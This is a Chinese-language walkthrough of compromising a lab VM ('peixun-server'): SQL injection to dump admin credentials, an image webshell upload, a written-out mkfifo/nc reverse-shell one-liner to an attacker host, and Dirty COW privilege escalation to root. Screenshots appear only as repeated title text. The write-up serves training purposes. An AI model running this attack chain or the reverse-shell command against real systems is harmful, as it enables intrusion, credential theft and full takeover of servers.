攻击机:

靶机渗透之peixun-server提权

主机发现:

靶机渗透之peixun-server提权

信息收集:

靶机渗透之peixun-server提权

端口详细信息:

靶机渗透之peixun-server提权

尝试访问80端口,发现其有一web站点可以访问:

靶机渗透之peixun-server提权

对url:http://192.168.11.128/storypage_04.php?id=115进行测试,检查是否有SQL注入漏洞:

靶机渗透之peixun-server提权

报错,此处应该有注入点。

**数据库名:

靶机渗透之peixun-server提权

得到该数据库的所有数据库名:information_schema,mysql,performance_schema,tcic,test

爆当前使用的数据库为tcic:

靶机渗透之peixun-server提权

爆表名:

靶机渗透之peixun-server提权

tcic_account的字段:

靶机渗透之peixun-server提权

爆account和password的数据:

靶机渗透之peixun-server提权

拿到管理员的账号密码。

然后扫描后台网址:

靶机渗透之peixun-server提权

发现后台为http://192.168.11.128/back,尝试访问:

靶机渗透之peixun-server提权

用之前获取到的管理员账号密码登录:

靶机渗透之peixun-server提权

对后台各个功能进行使用,发现“首页管理系统”中的“新增大图”能上传图片,制作图片马上传,看看能不能用,成功:

靶机渗透之peixun-server提权

用菜刀连接试试:

http://192.168.11.133/back/upload/banner_66.php

连接成功,拿到webshell(注:中途重装过peixun-server,故IP变为192.168.11.133)。

靶机渗透之peixun-server提权

下面尝试提权。

蚁剑输入命令:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.11.130 6666 >/tmp/f

然后在kali开启监听6666端口,反弹shell成功:

靶机渗透之peixun-server提权

然后提权:

蚁剑上传dirty.c到服务器:

靶机渗透之peixun-server提权

编译:

靶机渗透之peixun-server提权

脏牛执行成功:

靶机渗透之peixun-server提权

提权成功:

 

靶机渗透之peixun-server提权

得到了root:

靶机渗透之peixun-server提权靶机渗透之peixun-server提权

相关文章:

  • 2021-06-11
  • 2021-10-25
  • 2021-11-25
  • 2022-12-23
  • 2021-08-19
  • 2022-01-01
  • 2021-12-13
  • 2021-04-05
猜你喜欢
  • 2021-08-02
  • 2022-12-23
  • 2021-11-08
  • 2021-09-24
  • 2021-05-11
  • 2021-04-17
相关资源
相似解决方案